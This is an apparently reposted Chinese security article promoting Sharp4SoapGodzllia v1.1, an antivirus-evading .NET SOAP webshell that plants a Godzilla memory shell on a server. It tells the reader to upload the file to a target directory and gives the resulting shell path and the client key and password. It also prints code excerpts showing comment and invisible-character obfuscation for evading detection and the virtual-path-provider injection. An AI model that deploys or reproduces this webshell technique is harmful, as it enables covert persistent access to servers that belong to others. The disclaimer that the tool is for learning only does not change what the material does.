欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 财经 > 金融 > .NET SoapShell 更新 | 发布增强免杀版适配哥斯拉客户端的WebShell

.NET SoapShell 更新 | 发布增强免杀版适配哥斯拉客户端的WebShell

2024/10/24 8:29:31 来源:https://blog.csdn.net/ahhacker86/article/details/142910290  浏览:    关键词:.NET SoapShell 更新 | 发布增强免杀版适配哥斯拉客户端的WebShell

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4SoapGodzlliav1.1.soap是一款增强免杀的 SoapShell,支持在服务器上植入哥斯拉内存马,这款工具不仅可以灵活地运行在服务器的根目录或子目录下,还通过多种技术手段提高了 Bypass能力,为后续的信息搜集和渗透攻击提供了重要支持。

图片

03使用方法

将 Sharp4SoapGodzlliav1.1.soap 文件上传到服务器的目标目录,上传文件成功后可以自动植入支持哥斯拉的内存马,具体的访问路径会以响应信息的形式返回,供用户参考。通常情况下,内存马的访问路径会如以下示例所示

uploadfiles/dotNetMatrix/Godzllia1.1.aspx

成功植入内存马后,Sharp4SoapGodzlliav1.1 将会返回详细的服务器环境信息,便于攻击者进一步分析。这些信息包括内存马具体的访问路径、网站当前的绝对路径、.NET Framework版本以及Windows操作系统版本等

图片

要使用“哥斯拉”客户端与服务器上的 Sharp4SoapGodzllia v1.1 内存马进行交互,需要将密钥和密码均设置为 dotNetMatrix,这样客户端即可顺利连接到目标服务器上的内存马,并执行各种命令和操作。

图片

04原理解析

以下是Sharp4SoapGodzllia v1.1的一部分代码,利用HTML和JavaScript以及Unicode编码进行隐蔽操作:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head id="Head1"><title></title><link href="favorate.ico?ver=286.7" rel="shortcut icon" type="image/x-icon" /><!--<script src="Content/Script/cloud.js" type="text/javascript"></script>--><style>.icon {position: relative;}.icon_one, .icon_two {position: absolute;top: 25%;left: 58px;color: #7f8499;}</style>
</head>

随后,通过使用注释和不可见字符,Sharp4SoapGodzllia v1.1 能够有效地规避安全软件的查杀和拦截。

<script type="text/javascript">$(function () {$('.loginbox').fadeIn();if (document.getElementById("User").value == "") {document.getElementById("User").focus();} else {document.getElementById("User").focus();}});
</script>
<%@ PAge LaNgUagE=cs%>
<%/*UoWa*//*UoWa*/try/*UoWa*/{/*UoWa*//*UoWa*/%>
<!--<body style="background-color: #1c77ac; background-image: url(Content/img.png); background-repeat: no-repeat; background-position: center top; overflow: hidden;">-->

接着,通过base64编码和RegisterVirtualPathProvider方法实现哥斯拉内存马注入,具体代码如下所示。

SamplePathProvider sampleProvider = new SamplePathProvider(targetVirtualPath, webshellContent);
System.Web.Hosting.HostingEnvironment.RegisterVirtualPathProvider(sampleProvider);
System.Web.HttpContext.Current.Response.Write("<pre style='text-align: center;font-weight: Bold;'> Soap Memory Shell For Godzllia </pre>");
System.Web.HttpContext.Current.Response.Write("<pre>");
System.Web.HttpContext.Current.Response.Write("1. Memory Shell Path: " + targetVirtualPath + "Godzllia1.1.aspx \r\n");
System.Web.HttpContext.Current.Response.Write("2. WebSite Application Path: " +  System.Web.HttpContext.Current.Server.MapPath(System.Web.HttpContext.Current.Request.ApplicationPath) + "\r\n");
System.Web.HttpContext.Current.Response.Write("3. dotNet FrameWork Version: " + System.Environment.Version + "\r\n" );
System.Web.HttpContext.Current.Response.Write("4. Windows OSVersion: " + System.Environment.OSVersion + "\r\n" );
System.Web.HttpContext.Current.Response.Write("5. Just for Research, Do Not Abuse It! Author: dotNet Security Matrix Team  \r\n" );
System.Web.HttpContext.Current.Response.Write("</pre>");
System.Web.HttpContext.Current.Response.End();

综上,Sharp4SoapGodzllia v1.1 作为增强免杀的 Webshell 工具,不仅能在服务器上植入内存马,还可以返回详细的服务器环境信息。

 05.NET安全知识库

图片

图片

星球文化20+个专题栏目涵盖了点、线、面、体等知识面!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    

图片

图片

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com